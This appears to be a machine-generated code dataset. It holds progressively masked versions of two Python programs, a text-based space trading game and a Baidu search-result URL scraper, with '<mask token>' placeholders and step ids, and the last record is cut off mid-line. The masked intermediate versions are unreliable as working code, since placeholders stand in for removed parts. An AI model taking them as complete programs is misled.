shipyard')\n print('Enter 2 to go to the market')\n print('Enter 3 to go to the spaceport')\n print('Enter exit to leave the game')\n userinput = input('Your Input:')\n if userinput == '1':\n shipyardMenu(player, planet)\n elif userinput == '2':\n marketMenu(player, planet)\n elif userinput == '3':\n planet = spacePortMenu(player, planet)\n else:\n notFinished = False\n\n\n<mask token>\n",
"step-3": "<mask token>\nturnCounter = 0\n\n\ndef cleanScreen():\n for i in range(0, 50):\n print('')\n\n\ndef spacePirates(player):\n while True:\n cleanScreen()\n print('*****F*U*C*K****S*P*A*C*E*P*I*R*A*T*E*S***A*T*T*A*C*K*****')\n playerFirepower = player.getTotalFirepower()\n piratesFirepower = int(playerFirepower * (1 + random.randint(-20, \n 20) / 100))\n if random.randint(0, playerFirepower\n ) > playerFirepower / 3 and random.randint(0, piratesFirepower\n ) < piratesFirepower / 3 or playerFirepower == 0:\n print('Damm, you got robbed by the pirates!')\n print('You lost all your cargo and half your money!')\n player.clearTech()\n player.clearFood()\n player.updateCargoUnits()\n player.setCredits(player.getCredits() / 2)\n else:\n print('Lucky you! Your fighters drove them off!')\n print('**********************************************************')\n input('Hit enter to continue')\n break\n\n\ndef shipyardMenu(player, planet):\n while True:\n cleanScreen()\n print('*****W*E*L*C*O*M*E****T*O****T*H*E****S*H*I*P*Y*A*R*D*****')\n player.printStats()\n print('**********************************************************')\n shipList = planet.getShipyard()\n print('Available Ships:')\n print('**********************************************************')\n i = 0\n for s in shipList:\n print('Nr.:' + str(i) + ':' + s.toString())\n i += 1\n print('**********************************************************')\n userInput = input(\n 'Enter the number you would like to by or x to leave:')\n if userInput == 'x':\n break\n else:\n ui = int(userInput)\n if ui <= i:\n if player.getCredits() > shipList[ui].getPrice():\n if type(shipList[ui]) == FighterShip:\n player.addFighterShip(shipList[ui])\n player.updateFirePower()\n else:\n player.addCargoShip(shipList[ui])\n player.updateCargoUnits()\n player.setCredits(player.getCredits() - shipList[ui].\n getPrice())\n player.updateMaintenance()\n del shipList[ui]\n else:\n print('wrong number, try again ....')\n\n\ndef spacePortMenu(player, planet):\n global turnCounter\n while True:\n cleanScreen()\n print('****W*E*L*C*O*M*E****T*O****T*H*E****S*P*A*C*E*P*O*R*T****')\n print('Enter 1 to jump to a agri planet (risk 5%)')\n print('Enter 2 to jump to a tech planet (risk 10%)')\n print('Enter 3 to jump to a war planet (risk 20%)')\n userInput = input('Or enter x to exit:')\n risk = 0\n if userInput == 'x':\n return planet\n elif userInput == '1':\n risk = 5\n elif userInput == '2':\n risk = 10\n else:\n risk = 20\n if random.randint(0, 100) <= risk:\n spacePirates(player)\n player.setCredits(player.getCredits() - player.getTotalMaintenance())\n turnCounter += 1\n return Planet.Planet(int(userInput))\n\n\ndef marketMenu(player, planet):\n while True:\n cleanScreen()\n print('*******W*E*L*C*O*M*E****T*O****T*H*E****M*A*R*K*E*T*******')\n player.printStats()\n print('**********************************************************')\n market = planet.getMarket()\n print('Price for Food = ', market['Food'])\n print('Price for Tech = ', market['Tech'])\n print('**********************************************************')\n userInput = input('Enter 1 for Food, 2 for Tech or x for exit:')\n str = ''\n if userInput == '1':\n str = 'Food'\n elif userInput == '2':\n str = 'Tech'\n else:\n break\n print('**********************************************************')\n max = 0\n if market[str] * player.freeCargoUnits <= player.getCredits():\n max = player.freeCargoUnits\n else:\n max = int(player.getCredits() / market[str])\n print('Price for ' + str + ' = ', market[str])\n 
secondInput = input(\n 'Would you like to buy (enter b) or sell (enter s)?')\n if secondInput == 'b':\n print('You can buy a maximum of', max, 'units')\n nr = input('How much would you like to buy? Or press x to exit')\n if nr == 'x':\n pass\n else:\n nr = int(nr)\n if player.getCredits() > market[str] * nr and nr <= max:\n if str == 'Food':\n player.addFood(nr)\n else:\n player.addTech(nr)\n player.setCredits(player.getCredits() - market[str] * nr)\n player.updateCargoUnits()\n elif str == 'Food':\n print('You can sell a maximum of', player.getFood(), 'food units')\n nr = input('How much would you like to sell? Or press x to exit')\n if nr == 'x':\n pass\n else:\n nr = int(nr)\n if nr <= player.getFood():\n player.sellFood(nr)\n player.setCredits(player.getCredits() + nr * market['Food']\n )\n else:\n print('You can sell a maximum of', player.getTech(), 'tech units')\n nr = input('How much would you like to sell? Or press x to exit')\n if nr == 'x':\n pass\n else:\n nr = int(nr)\n if nr <= player.getTech():\n player.sellTech(nr)\n player.setCredits(player.getCredits() + nr * market['Tech']\n )\n\n\ndef menu(player):\n global turnCounter\n notFinished = True\n planet = Planet.Planet(random.randint(1, 3))\n while notFinished:\n cleanScreen()\n if player.getCredits() < 0:\n print(\n 'Sorry, but you ran out of credits and therefore lost the game in round,'\n , turnCounter, '!')\n break\n print('**********************************************************')\n print('Turn nr.', turnCounter,\n 'in this glorious space trading simulation')\n player.printStats()\n print('**********************************************************')\n print('You are on Planet:', planet.getName())\n print('**********************************************************')\n print('Enter 1 to go to the shipyard')\n print('Enter 2 to go to the market')\n print('Enter 3 to go to the spaceport')\n print('Enter exit to leave the game')\n userinput = input('Your Input:')\n if userinput == '1':\n shipyardMenu(player, planet)\n elif userinput == '2':\n marketMenu(player, planet)\n elif userinput == '3':\n planet = spacePortMenu(player, planet)\n else:\n notFinished = False\n\n\nprint('***************************************')\nprint(' Welcome to StarSim')\nprint('***************************************')\nname = input('Please enter your Name:')\nplayer = Player.Player(name)\nmenu(player)\n",
"step-4": "<mask token>\nimport Ship\nimport Player\nimport Planet\nimport random\nfrom FighterShip import FighterShip\nturnCounter = 0\n\n\ndef cleanScreen():\n for i in range(0, 50):\n print('')\n\n\ndef spacePirates(player):\n while True:\n cleanScreen()\n print('*****F*U*C*K****S*P*A*C*E*P*I*R*A*T*E*S***A*T*T*A*C*K*****')\n playerFirepower = player.getTotalFirepower()\n piratesFirepower = int(playerFirepower * (1 + random.randint(-20, \n 20) / 100))\n if random.randint(0, playerFirepower\n ) > playerFirepower / 3 and random.randint(0, piratesFirepower\n ) < piratesFirepower / 3 or playerFirepower == 0:\n print('Damm, you got robbed by the pirates!')\n print('You lost all your cargo and half your money!')\n player.clearTech()\n player.clearFood()\n player.updateCargoUnits()\n player.setCredits(player.getCredits() / 2)\n else:\n print('Lucky you! Your fighters drove them off!')\n print('**********************************************************')\n input('Hit enter to continue')\n break\n\n\ndef shipyardMenu(player, planet):\n while True:\n cleanScreen()\n print('*****W*E*L*C*O*M*E****T*O****T*H*E****S*H*I*P*Y*A*R*D*****')\n player.printStats()\n print('**********************************************************')\n shipList = planet.getShipyard()\n print('Available Ships:')\n print('**********************************************************')\n i = 0\n for s in shipList:\n print('Nr.:' + str(i) + ':' + s.toString())\n i += 1\n print('**********************************************************')\n userInput = input(\n 'Enter the number you would like to by or x to leave:')\n if userInput == 'x':\n break\n else:\n ui = int(userInput)\n if ui <= i:\n if player.getCredits() > shipList[ui].getPrice():\n if type(shipList[ui]) == FighterShip:\n player.addFighterShip(shipList[ui])\n player.updateFirePower()\n else:\n player.addCargoShip(shipList[ui])\n player.updateCargoUnits()\n player.setCredits(player.getCredits() - shipList[ui].\n getPrice())\n player.updateMaintenance()\n del shipList[ui]\n else:\n print('wrong number, try again ....')\n\n\ndef spacePortMenu(player, planet):\n global turnCounter\n while True:\n cleanScreen()\n print('****W*E*L*C*O*M*E****T*O****T*H*E****S*P*A*C*E*P*O*R*T****')\n print('Enter 1 to jump to a agri planet (risk 5%)')\n print('Enter 2 to jump to a tech planet (risk 10%)')\n print('Enter 3 to jump to a war planet (risk 20%)')\n userInput = input('Or enter x to exit:')\n risk = 0\n if userInput == 'x':\n return planet\n elif userInput == '1':\n risk = 5\n elif userInput == '2':\n risk = 10\n else:\n risk = 20\n if random.randint(0, 100) <= risk:\n spacePirates(player)\n player.setCredits(player.getCredits() - player.getTotalMaintenance())\n turnCounter += 1\n return Planet.Planet(int(userInput))\n\n\ndef marketMenu(player, planet):\n while True:\n cleanScreen()\n print('*******W*E*L*C*O*M*E****T*O****T*H*E****M*A*R*K*E*T*******')\n player.printStats()\n print('**********************************************************')\n market = planet.getMarket()\n print('Price for Food = ', market['Food'])\n print('Price for Tech = ', market['Tech'])\n print('**********************************************************')\n userInput = input('Enter 1 for Food, 2 for Tech or x for exit:')\n str = ''\n if userInput == '1':\n str = 'Food'\n elif userInput == '2':\n str = 'Tech'\n else:\n break\n print('**********************************************************')\n max = 0\n if market[str] * player.freeCargoUnits <= player.getCredits():\n max = player.freeCargoUnits\n else:\n max = 
int(player.getCredits() / market[str])\n print('Price for ' + str + ' = ', market[str])\n secondInput = input(\n 'Would you like to buy (enter b) or sell (enter s)?')\n if secondInput == 'b':\n print('You can buy a maximum of', max, 'units')\n nr = input('How much would you like to buy? Or press x to exit')\n if nr == 'x':\n pass\n else:\n nr = int(nr)\n if player.getCredits() > market[str] * nr and nr <= max:\n if str == 'Food':\n player.addFood(nr)\n else:\n player.addTech(nr)\n player.setCredits(player.getCredits() - market[str] * nr)\n player.updateCargoUnits()\n elif str == 'Food':\n print('You can sell a maximum of', player.getFood(), 'food units')\n nr = input('How much would you like to sell? Or press x to exit')\n if nr == 'x':\n pass\n else:\n nr = int(nr)\n if nr <= player.getFood():\n player.sellFood(nr)\n player.setCredits(player.getCredits() + nr * market['Food']\n )\n else:\n print('You can sell a maximum of', player.getTech(), 'tech units')\n nr = input('How much would you like to sell? Or press x to exit')\n if nr == 'x':\n pass\n else:\n nr = int(nr)\n if nr <= player.getTech():\n player.sellTech(nr)\n player.setCredits(player.getCredits() + nr * market['Tech']\n )\n\n\ndef menu(player):\n global turnCounter\n notFinished = True\n planet = Planet.Planet(random.randint(1, 3))\n while notFinished:\n cleanScreen()\n if player.getCredits() < 0:\n print(\n 'Sorry, but you ran out of credits and therefore lost the game in round,'\n , turnCounter, '!')\n break\n print('**********************************************************')\n print('Turn nr.', turnCounter,\n 'in this glorious space trading simulation')\n player.printStats()\n print('**********************************************************')\n print('You are on Planet:', planet.getName())\n print('**********************************************************')\n print('Enter 1 to go to the shipyard')\n print('Enter 2 to go to the market')\n print('Enter 3 to go to the spaceport')\n print('Enter exit to leave the game')\n userinput = input('Your Input:')\n if userinput == '1':\n shipyardMenu(player, planet)\n elif userinput == '2':\n marketMenu(player, planet)\n elif userinput == '3':\n planet = spacePortMenu(player, planet)\n else:\n notFinished = False\n\n\nprint('***************************************')\nprint(' Welcome to StarSim')\nprint('***************************************')\nname = input('Please enter your Name:')\nplayer = Player.Player(name)\nmenu(player)\n",
"step-5": "'''\nCreated on 17.05.2018\n\n@author: markus\n'''\nimport Ship\nimport Player\nimport Planet\nimport random\nfrom FighterShip import FighterShip\n\nturnCounter = 0\n\ndef cleanScreen():\n for i in range(0,50):\n print(\"\")\n \ndef spacePirates(player):#space prites attack, their firepower is +/-20% of player firepower\n while True:# loop\n cleanScreen()\n print(\"*****F*U*C*K****S*P*A*C*E*P*I*R*A*T*E*S***A*T*T*A*C*K*****\")\n playerFirepower = player.getTotalFirepower()\n piratesFirepower = int(playerFirepower*(1+random.randint(-20,20)/100))\n if ((random.randint(0,playerFirepower) > playerFirepower/3) and \n (random.randint(0,piratesFirepower) < piratesFirepower/3) or (playerFirepower == 0)):\n print(\"Damm, you got robbed by the pirates!\")\n print(\"You lost all your cargo and half your money!\")\n player.clearTech()\n player.clearFood()\n player.updateCargoUnits()\n player.setCredits(player.getCredits()/2)\n else:\n print(\"Lucky you! Your fighters drove them off!\")\n print(\"**********************************************************\")\n input(\"Hit enter to continue\")\n break\n \n\ndef shipyardMenu(player, planet):\n while True:# loop\n cleanScreen()\n print(\"*****W*E*L*C*O*M*E****T*O****T*H*E****S*H*I*P*Y*A*R*D*****\")\n player.printStats()\n print(\"**********************************************************\")\n shipList = planet.getShipyard()\n print(\"Available Ships:\")\n print(\"**********************************************************\")\n i = 0\n for s in shipList:\n print(\"Nr.:\"+str(i)+\":\"+s.toString())\n i += 1\n print(\"**********************************************************\") \n userInput = input(\"Enter the number you would like to by or x to leave:\") \n if (userInput == \"x\"):\n break;\n else:\n ui = int(userInput)\n if (ui <= i):\n if(player.getCredits() > shipList[ui].getPrice()): #has enough money\n if(type(shipList[ui]) == FighterShip):\n player.addFighterShip(shipList[ui])\n player.updateFirePower()\n else:\n player.addCargoShip(shipList[ui])\n player.updateCargoUnits()\n player.setCredits(player.getCredits() - shipList[ui].getPrice())\n player.updateMaintenance()\n del shipList[ui]\n else:\n print(\"wrong number, try again ....\")\n\ndef spacePortMenu(player, planet):\n global turnCounter\n while True:# loop\n cleanScreen()\n print(\"****W*E*L*C*O*M*E****T*O****T*H*E****S*P*A*C*E*P*O*R*T****\")\n print(\"Enter 1 to jump to a agri planet (risk 5%)\")\n print(\"Enter 2 to jump to a tech planet (risk 10%)\")\n print(\"Enter 3 to jump to a war planet (risk 20%)\")\n userInput = input(\"Or enter x to exit:\")\n risk = 0\n if (userInput == \"x\"):\n return planet\n elif (userInput == \"1\"):\n risk = 5\n elif(userInput == \"2\"):\n risk = 10\n else:\n risk = 20 \n if (random.randint(0,100) <= risk):\n spacePirates(player)\n player.setCredits(player.getCredits() - player.getTotalMaintenance())\n turnCounter += 1 \n return Planet.Planet(int(userInput))\n \ndef marketMenu(player, planet):\n while True:# loop\n cleanScreen()\n print(\"*******W*E*L*C*O*M*E****T*O****T*H*E****M*A*R*K*E*T*******\")\n player.printStats()\n print(\"**********************************************************\")\n market = planet.getMarket()\n print(\"Price for Food = \",market[\"Food\"])\n print(\"Price for Tech = \",market[\"Tech\"])\n print(\"**********************************************************\")\n userInput = input(\"Enter 1 for Food, 2 for Tech or x for exit:\")\n str =\"\"\n if (userInput == \"1\"):\n str = \"Food\"\n elif(userInput == \"2\"):\n str= 
\"Tech\"\n else:\n break\n print(\"**********************************************************\")\n max = 0\n if(market[str]*player.freeCargoUnits <= player.getCredits()):#enough credit?\n max = player.freeCargoUnits\n else:\n max = int(player.getCredits()/market[str])\n print(\"Price for \"+str+\" = \",market[str])\n secondInput = input(\"Would you like to buy (enter b) or sell (enter s)?\")\n if (secondInput == \"b\"):#buying\n print(\"You can buy a maximum of\",max,\"units\")\n nr = input(\"How much would you like to buy? Or press x to exit\")\n if (nr == \"x\"):\n pass\n else:\n nr = int(nr)\n if((player.getCredits() > market[str]*nr) and (nr <= max)): #has enough money and space\n if (str == \"Food\"):\n player.addFood(nr)\n else:\n player.addTech(nr)\n player.setCredits(player.getCredits() - market[str]*nr)\n player.updateCargoUnits()\n else:#selling\n if (str == \"Food\"):\n print(\"You can sell a maximum of\",player.getFood(),\"food units\")\n nr = input(\"How much would you like to sell? Or press x to exit\")\n if (nr == \"x\"):\n pass\n else:\n nr = int(nr)\n if (nr <= player.getFood()):\n player.sellFood(nr)\n player.setCredits(player.getCredits() + nr*market[\"Food\"])\n else:\n print(\"You can sell a maximum of\",player.getTech(),\"tech units\")\n nr = input(\"How much would you like to sell? Or press x to exit\")\n if (nr == \"x\"):\n pass\n else:\n nr = int(nr)\n if (nr <= player.getTech()):\n player.sellTech(nr)\n player.setCredits(player.getCredits() + nr*market[\"Tech\"])\n \n \n \n \ndef menu(player):\n global turnCounter\n notFinished = True\n planet = Planet.Planet(random.randint(1,3))\n while notFinished:#main game loop \n cleanScreen()\n if (player.getCredits() < 0):\n print(\"Sorry, but you ran out of credits and therefore lost the game in round,\",turnCounter,\"!\")\n break\n print(\"**********************************************************\")\n print(\"Turn nr.\",turnCounter,\"in this glorious space trading simulation\")\n player.printStats()\n print(\"**********************************************************\")\n print(\"You are on Planet:\",planet.getName())\n print(\"**********************************************************\")\n print(\"Enter 1 to go to the shipyard\")\n print(\"Enter 2 to go to the market\")\n print(\"Enter 3 to go to the spaceport\")\n print(\"Enter exit to leave the game\")\n userinput = input(\"Your Input:\")\n if (userinput == \"1\"):\n shipyardMenu(player, planet)\n elif (userinput == \"2\"):\n marketMenu(player, planet)\n elif (userinput == \"3\"):\n planet = spacePortMenu(player, planet)\n else: \n notFinished = False\n \n \n \n\nprint(\"***************************************\")\nprint(\" Welcome to StarSim\")\nprint(\"***************************************\")\nname = input(\"Please enter your Name:\")\nplayer = Player.Player(name)\nmenu(player)\n\n\n\n\n\n",
"step-ids": [
2,
5,
8,
9,
10
]
}
|
[
2,
5,
8,
9,
10
] |
# -*- coding: utf-8 -*-
# Project = https://github.com/super-l/search-url.git
# Author = superl
# Blog = www.superl.org QQ:86717375
# Team = Code Security Team(C.S.T) | 铭剑创鼎
import urllib2
import re
import ConfigParser
from lib.filter import *
from lib.getdata import *
from lib.count import *
from lib.status import *
class Baidu():
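    # Scrapes one page of Baidu results at a time, runs each hit through the
    # configured filter and optionally appends deduplicated lines to <key>.txt.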
baidu_page_size = 50
search_name = '[baidu]'
def __init__(self,count) :
cfg = ConfigParser.ConfigParser()
cfg.read("config/setting.conf")
self.baidu_page_size = int(cfg.get("search", "baidu_page_size"))
self.savefile = cfg.get("global", "savefile")
self.write_title = cfg.get("log", "write_title")
self.write_name = cfg.get("log", "write_name")
self.my_filter = SupFilter()
self.my_data = SupGetData()
self.my_status = Supstatus()
self.count = count
#Get the web page source code
def search(self,key,page_pn):
#The number of baidu pages currently viewed
#page_num = page_pn/baidu_page_size
page_num = str(page_pn/self.baidu_page_size+1)
search_url = 'http://www.baidu.com/s?wd=key&rn='+str(self.baidu_page_size)+'&pn='+str(page_pn)
search_url = search_url.replace('key',key)
#print search_url
htmlcontent = self.my_data.get_pagehtml(search_url,'baidu')
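        # verify the requested page really loaded by looking for its number in
        # the pager; otherwise mark the Baidu search as exhausted and stop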
regex_page = r'<span class="pc">'+page_num+'</span>'
page_compile = re.compile(regex_page)
page_result = page_compile.findall(htmlcontent)
        if not page_result:
            self.my_status.baidu_search = False
            return
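        # capture each result's landing URL and title; the pattern tolerates
        # line breaks between the href, target and anchor-text fragments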
regex_titleurl = r'<div class="result c-container ".*<h3 class=".*"><a(?:[^\<]*\n[^\<]*)href = "(?P<url>.+?)"(?:[^\<]*\n[^\<]*)target="_blank"(?:[^\<]*\n[^\<]*)>(?P<title>.+?)</a></h3>'
content = re.compile(regex_titleurl)
find_result = content.findall(htmlcontent)
print ("\033[1;37;40m==========================百度 第%s页采集开始================\n"%(page_num))
if self.savefile == 'True':
logfile = open(key+'.txt','a')
for i in range(len(find_result)):
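            # strip residual HTML tags (e.g. Baidu's <em> highlights) from the title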
dr = re.compile(r'<[^>]+>',re.S)
title = dr.sub('',find_result[i][1])
realurl = self.my_data.get_baidu_realurl(find_result[i][0])
self.count.all_totals+=1
realurl = self.my_filter.filter_data(realurl,title)
if realurl != "filter":
self.count.all_checked_totals+=1
print ("[ID]:%d [URL]:%s [TITLE]:%s"%(i,realurl,title))
if self.savefile == 'True':
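                    # re-scan the log file so the same URL is never written twice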
have_url = 0
with open(key+'.txt','r') as foo:
for line in foo.readlines():
if realurl in line:
have_url = 1
                    if have_url == 0:
                        if self.write_title == 'True':
                            if self.write_name == 'True':
                                logfile.write(self.search_name+realurl+' '+title+'\n')
                            else:
                                logfile.write(realurl+' '+title+'\n')
                        else:
                            if self.write_name == 'True':
                                logfile.write(self.search_name+realurl+'\n')
                            else:
                                logfile.write(realurl+'\n')
else:
self.count.all_delete_totals+=1
else:
self.count.all_filter_totals+=1
if self.savefile == 'True':
logfile.close()
print ("==========================百度 第%s页采集结束================\n"%(page_num))
|
normal
|
{
"blob_id": "b724b04c6303cc9021539ad7df5a198000491029",
"index": 5436,
"step-1": "<mask token>\n\n\nclass Baidu:\n <mask token>\n <mask token>\n\n def __init__(self, count):\n cfg = ConfigParser.ConfigParser()\n cfg.read('config/setting.conf')\n self.baidu_page_size = int(cfg.get('search', 'baidu_page_size'))\n self.savefile = cfg.get('global', 'savefile')\n self.write_title = cfg.get('log', 'write_title')\n self.write_name = cfg.get('log', 'write_name')\n self.my_filter = SupFilter()\n self.my_data = SupGetData()\n self.my_status = Supstatus()\n self.count = count\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Baidu:\n <mask token>\n <mask token>\n\n def __init__(self, count):\n cfg = ConfigParser.ConfigParser()\n cfg.read('config/setting.conf')\n self.baidu_page_size = int(cfg.get('search', 'baidu_page_size'))\n self.savefile = cfg.get('global', 'savefile')\n self.write_title = cfg.get('log', 'write_title')\n self.write_name = cfg.get('log', 'write_name')\n self.my_filter = SupFilter()\n self.my_data = SupGetData()\n self.my_status = Supstatus()\n self.count = count\n\n def search(self, key, page_pn):\n page_num = str(page_pn / self.baidu_page_size + 1)\n search_url = 'http://www.baidu.com/s?wd=key&rn=' + str(self.\n baidu_page_size) + '&pn=' + str(page_pn)\n search_url = search_url.replace('key', key)\n htmlcontent = self.my_data.get_pagehtml(search_url, 'baidu')\n regex_page = '<span class=\"pc\">' + page_num + '</span>'\n page_compile = re.compile(regex_page)\n page_result = page_compile.findall(htmlcontent)\n if page_result:\n pass\n else:\n self.my_status.baidu_search = False\n return\n regex_titleurl = (\n '<div class=\"result c-container \".*<h3 class=\".*\"><a(?:[^\\\\<]*\\\\n[^\\\\<]*)href = \"(?P<url>.+?)\"(?:[^\\\\<]*\\\\n[^\\\\<]*)target=\"_blank\"(?:[^\\\\<]*\\\\n[^\\\\<]*)>(?P<title>.+?)</a></h3>'\n )\n content = re.compile(regex_titleurl)\n find_result = content.findall(htmlcontent)\n print(\n '\\x1b[1;37;40m==========================百度 第%s页采集开始================\\n'\n % page_num)\n if self.savefile == 'True':\n logfile = open(key + '.txt', 'a')\n for i in range(len(find_result)):\n dr = re.compile('<[^>]+>', re.S)\n title = dr.sub('', find_result[i][1])\n realurl = self.my_data.get_baidu_realurl(find_result[i][0])\n self.count.all_totals += 1\n realurl = self.my_filter.filter_data(realurl, title)\n if realurl != 'filter':\n self.count.all_checked_totals += 1\n print('[ID]:%d [URL]:%s [TITLE]:%s' % (i, realurl, title))\n if self.savefile == 'True':\n have_url = 0\n with open(key + '.txt', 'r') as foo:\n for line in foo.readlines():\n if realurl in line:\n have_url = 1\n if have_url == 0:\n if self.write_title:\n if self.write_name:\n logfile.write(self.search_name +\n realurl + ' ' + title + '\\n')\n else:\n logfile.write(realurl + ' ' + title +\n '\\n')\n elif self.write_name:\n logfile.write(self.search_name + realurl + '\\n'\n )\n else:\n logfile.write(realurl + '\\n')\n else:\n self.count.all_delete_totals += 1\n else:\n self.count.all_filter_totals += 1\n if self.savefile == 'True':\n logfile.close()\n print('==========================百度 第%s页采集结束================\\n' %\n page_num)\n",
"step-3": "<mask token>\n\n\nclass Baidu:\n baidu_page_size = 50\n search_name = '[baidu]'\n\n def __init__(self, count):\n cfg = ConfigParser.ConfigParser()\n cfg.read('config/setting.conf')\n self.baidu_page_size = int(cfg.get('search', 'baidu_page_size'))\n self.savefile = cfg.get('global', 'savefile')\n self.write_title = cfg.get('log', 'write_title')\n self.write_name = cfg.get('log', 'write_name')\n self.my_filter = SupFilter()\n self.my_data = SupGetData()\n self.my_status = Supstatus()\n self.count = count\n\n def search(self, key, page_pn):\n page_num = str(page_pn / self.baidu_page_size + 1)\n search_url = 'http://www.baidu.com/s?wd=key&rn=' + str(self.\n baidu_page_size) + '&pn=' + str(page_pn)\n search_url = search_url.replace('key', key)\n htmlcontent = self.my_data.get_pagehtml(search_url, 'baidu')\n regex_page = '<span class=\"pc\">' + page_num + '</span>'\n page_compile = re.compile(regex_page)\n page_result = page_compile.findall(htmlcontent)\n if page_result:\n pass\n else:\n self.my_status.baidu_search = False\n return\n regex_titleurl = (\n '<div class=\"result c-container \".*<h3 class=\".*\"><a(?:[^\\\\<]*\\\\n[^\\\\<]*)href = \"(?P<url>.+?)\"(?:[^\\\\<]*\\\\n[^\\\\<]*)target=\"_blank\"(?:[^\\\\<]*\\\\n[^\\\\<]*)>(?P<title>.+?)</a></h3>'\n )\n content = re.compile(regex_titleurl)\n find_result = content.findall(htmlcontent)\n print(\n '\\x1b[1;37;40m==========================百度 第%s页采集开始================\\n'\n % page_num)\n if self.savefile == 'True':\n logfile = open(key + '.txt', 'a')\n for i in range(len(find_result)):\n dr = re.compile('<[^>]+>', re.S)\n title = dr.sub('', find_result[i][1])\n realurl = self.my_data.get_baidu_realurl(find_result[i][0])\n self.count.all_totals += 1\n realurl = self.my_filter.filter_data(realurl, title)\n if realurl != 'filter':\n self.count.all_checked_totals += 1\n print('[ID]:%d [URL]:%s [TITLE]:%s' % (i, realurl, title))\n if self.savefile == 'True':\n have_url = 0\n with open(key + '.txt', 'r') as foo:\n for line in foo.readlines():\n if realurl in line:\n have_url = 1\n if have_url == 0:\n if self.write_title:\n if self.write_name:\n logfile.write(self.search_name +\n realurl + ' ' + title + '\\n')\n else:\n logfile.write(realurl + ' ' + title +\n '\\n')\n elif self.write_name:\n logfile.write(self.search_name + realurl + '\\n'\n )\n else:\n logfile.write(realurl + '\\n')\n else:\n self.count.all_delete_totals += 1\n else:\n self.count.all_filter_totals += 1\n if self.savefile == 'True':\n logfile.close()\n print('==========================百度 第%s页采集结束================\\n' %\n page_num)\n",
"step-4": "import urllib2\nimport re\nimport ConfigParser\nfrom lib.filter import *\nfrom lib.getdata import *\nfrom lib.count import *\nfrom lib.status import *\n\n\nclass Baidu:\n baidu_page_size = 50\n search_name = '[baidu]'\n\n def __init__(self, count):\n cfg = ConfigParser.ConfigParser()\n cfg.read('config/setting.conf')\n self.baidu_page_size = int(cfg.get('search', 'baidu_page_size'))\n self.savefile = cfg.get('global', 'savefile')\n self.write_title = cfg.get('log', 'write_title')\n self.write_name = cfg.get('log', 'write_name')\n self.my_filter = SupFilter()\n self.my_data = SupGetData()\n self.my_status = Supstatus()\n self.count = count\n\n def search(self, key, page_pn):\n page_num = str(page_pn / self.baidu_page_size + 1)\n search_url = 'http://www.baidu.com/s?wd=key&rn=' + str(self.\n baidu_page_size) + '&pn=' + str(page_pn)\n search_url = search_url.replace('key', key)\n htmlcontent = self.my_data.get_pagehtml(search_url, 'baidu')\n regex_page = '<span class=\"pc\">' + page_num + '</span>'\n page_compile = re.compile(regex_page)\n page_result = page_compile.findall(htmlcontent)\n if page_result:\n pass\n else:\n self.my_status.baidu_search = False\n return\n regex_titleurl = (\n '<div class=\"result c-container \".*<h3 class=\".*\"><a(?:[^\\\\<]*\\\\n[^\\\\<]*)href = \"(?P<url>.+?)\"(?:[^\\\\<]*\\\\n[^\\\\<]*)target=\"_blank\"(?:[^\\\\<]*\\\\n[^\\\\<]*)>(?P<title>.+?)</a></h3>'\n )\n content = re.compile(regex_titleurl)\n find_result = content.findall(htmlcontent)\n print(\n '\\x1b[1;37;40m==========================百度 第%s页采集开始================\\n'\n % page_num)\n if self.savefile == 'True':\n logfile = open(key + '.txt', 'a')\n for i in range(len(find_result)):\n dr = re.compile('<[^>]+>', re.S)\n title = dr.sub('', find_result[i][1])\n realurl = self.my_data.get_baidu_realurl(find_result[i][0])\n self.count.all_totals += 1\n realurl = self.my_filter.filter_data(realurl, title)\n if realurl != 'filter':\n self.count.all_checked_totals += 1\n print('[ID]:%d [URL]:%s [TITLE]:%s' % (i, realurl, title))\n if self.savefile == 'True':\n have_url = 0\n with open(key + '.txt', 'r') as foo:\n for line in foo.readlines():\n if realurl in line:\n have_url = 1\n if have_url == 0:\n if self.write_title:\n if self.write_name:\n logfile.write(self.search_name +\n realurl + ' ' + title + '\\n')\n else:\n logfile.write(realurl + ' ' + title +\n '\\n')\n elif self.write_name:\n logfile.write(self.search_name + realurl + '\\n'\n )\n else:\n logfile.write(realurl + '\\n')\n else:\n self.count.all_delete_totals += 1\n else:\n self.count.all_filter_totals += 1\n if self.savefile == 'True':\n logfile.close()\n print('==========================百度 第%s页采集结束================\\n' %\n page_num)\n",
"step-5": "# -*- coding: utf-8 -*-\n# Project = https://github.com/super-l/search-url.git\n# Author = superl\n# Blog = www.superl.org QQ:86717375\n# Team = Code Security Team(C.S.T) | 铭剑创鼎\nimport urllib2\nimport re \nimport ConfigParser\n\nfrom lib.filter import *\nfrom lib.getdata import *\nfrom lib.count import *\nfrom lib.status import *\n\nclass Baidu():\n\n baidu_page_size = 50\n search_name = '[baidu]'\n\n def __init__(self,count) :\n cfg = ConfigParser.ConfigParser()\n cfg.read(\"config/setting.conf\")\n\n self.baidu_page_size = int(cfg.get(\"search\", \"baidu_page_size\"))\n self.savefile = cfg.get(\"global\", \"savefile\")\n self.write_title = cfg.get(\"log\", \"write_title\")\n self.write_name = cfg.get(\"log\", \"write_name\")\n self.my_filter = SupFilter()\n self.my_data = SupGetData()\n self.my_status = Supstatus()\n self.count = count\n\n\n #Get the web page source code\n def search(self,key,page_pn):\n #The number of baidu pages currently viewed\n #page_num = page_pn/baidu_page_size\n page_num = str(page_pn/self.baidu_page_size+1)\n\n search_url = 'http://www.baidu.com/s?wd=key&rn='+str(self.baidu_page_size)+'&pn='+str(page_pn)\n search_url = search_url.replace('key',key)\n #print search_url\n htmlcontent = self.my_data.get_pagehtml(search_url,'baidu')\n\n regex_page = r'<span class=\"pc\">'+page_num+'</span>'\n page_compile = re.compile(regex_page)\n page_result = page_compile.findall(htmlcontent)\n\n if page_result:\n pass\n else:\n self.my_status.baidu_search = False\n return\n\n regex_titleurl = r'<div class=\"result c-container \".*<h3 class=\".*\"><a(?:[^\\<]*\\n[^\\<]*)href = \"(?P<url>.+?)\"(?:[^\\<]*\\n[^\\<]*)target=\"_blank\"(?:[^\\<]*\\n[^\\<]*)>(?P<title>.+?)</a></h3>'\n\n content = re.compile(regex_titleurl)\n find_result = content.findall(htmlcontent)\n\n print (\"\\033[1;37;40m==========================百度 第%s页采集开始================\\n\"%(page_num))\n \n if self.savefile == 'True':\n logfile = open(key+'.txt','a')\n\n for i in range(len(find_result)):\n dr = re.compile(r'<[^>]+>',re.S)\n title = dr.sub('',find_result[i][1])\n\n realurl = self.my_data.get_baidu_realurl(find_result[i][0])\n\n self.count.all_totals+=1\n\n \n realurl = self.my_filter.filter_data(realurl,title)\n\n if realurl != 